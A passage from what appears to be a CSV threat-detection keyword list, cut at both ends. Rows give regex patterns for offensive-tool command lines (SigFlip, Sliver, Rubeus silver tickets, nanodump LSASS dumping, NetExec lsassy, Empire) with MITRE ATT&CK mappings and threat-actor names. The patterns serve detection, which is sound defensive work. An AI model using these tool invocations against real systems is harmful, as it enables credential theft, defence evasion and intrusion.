T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* SigFlip.exe*",".{0,1000}\sSigFlip\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* SigFlip.PE*",".{0,1000}\sSigFlip\.PE.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* sigflip.x64.*",".{0,1000}\ssigflip\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* sigflip.x86.*",".{0,1000}\ssigflip\.x86\..{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* SigLoader *",".{0,1000}\sSigLoader\s.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","0","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "* --sign-domain *",".{0,1000}\s\-\-sign\-domain\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* --sign-steal *",".{0,1000}\s\-\-sign\-steal\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "* Sigwhatever*",".{0,1000}\sSigwhatever.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas","1","0","N/A","10","10","602","108","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" "* --silent -obf NixImports -o /tmp/*",".{0,1000}\s\-\-silent\s\-obf\sNixImports\s\-o\s\/tmp\/.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" "* --silent-process-exit *",".{0,1000}\s\-\-silent\-process\-exit\s.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "* silenttrinity.*",".{0,1000}\ssilenttrinity\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "* silver * /domain*",".{0,1000}\ssilver\s.{0,1000}\s\/domain.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* silver * /ldap *",".{0,1000}\ssilver\s.{0,1000}\s\/ldap\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* silver * /passlastset *",".{0,1000}\ssilver\s.{0,1000}\s\/passlastset\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* silver * /service:*",".{0,1000}\ssilver\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* simpleLoader.c -z execstack*",".{0,1000}\ssimpleLoader\.c\s\-z\sexecstack.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "* --single shadow.hashes*",".{0,1000}\s\-\-single\sshadow\.hashes.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "* sip-brute.nse*",".{0,1000}\ssip\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-call-spoof.nse*",".{0,1000}\ssip\-call\-spoof\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-enum-users.nse*",".{0,1000}\ssip\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sip-log4shell.nse*",".{0,1000}\ssip\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* sip-methods.nse*",".{0,1000}\ssip\-methods\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* sitadel.py*",".{0,1000}\ssitadel\.py.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "* -SiteListFilePath * -B64Pass *",".{0,1000}\s\-SiteListFilePath\s.{0,1000}\s\-B64Pass\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Get-System.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* --skip-crawl*",".{0,1000}\s\-\-skip\-crawl.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*- --skippasswordcheck*",".{0,1000}\-\s\-\-skippasswordcheck.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* --skipregistryloggedon*",".{0,1000}\s\-\-skipregistryloggedon.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* skypev2-version.nse*",".{0,1000}\sskypev2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*----- SLEEP HOOK -----*",".{0,1000}\-\-\-\-\-\sSLEEP\sHOOK\s\-\-\-\-\-.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","10","3","244","41","2023-10-22T12:33:50Z","2023-10-22T12:28:45Z" "* slip.py *",".{0,1000}\sslip\.py\s.{0,1000}","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","0","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "* sliver sliver*",".{0,1000}\ssliver\ssliver.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver.exe*",".{0,1000}\ssliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver_pb2.py*",".{0,1000}\ssliver_pb2\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* sliver_pb2_grpc.py*",".{0,1000}\ssliver_pb2_grpc\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "* sliver-client.exe*",".{0,1000}\ssliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver-client_windows.exe*",".{0,1000}\ssliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver-client_windows-386*.exe*",".{0,1000}\ssliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver-client_windows-amd64*.exe*",".{0,1000}\ssliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* sliver-client_windows-arm64*.exe*",".{0,1000}\ssliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* smb * --dpapi *password*",".{0,1000}\ssmb\s.{0,1000}\s\-\-dpapi\s.{0,1000}password.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * --gen-relay-list *.txt*",".{0,1000}\ssmb\s.{0,1000}\s\-\-gen\-relay\-list\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * --lsa --log *",".{0,1000}\ssmb\s.{0,1000}\s\-\-lsa\s\-\-log\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* smb * -M lsassy*",".{0,1000}\ssmb\s.{0,1000}\s\-M\slsassy.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - 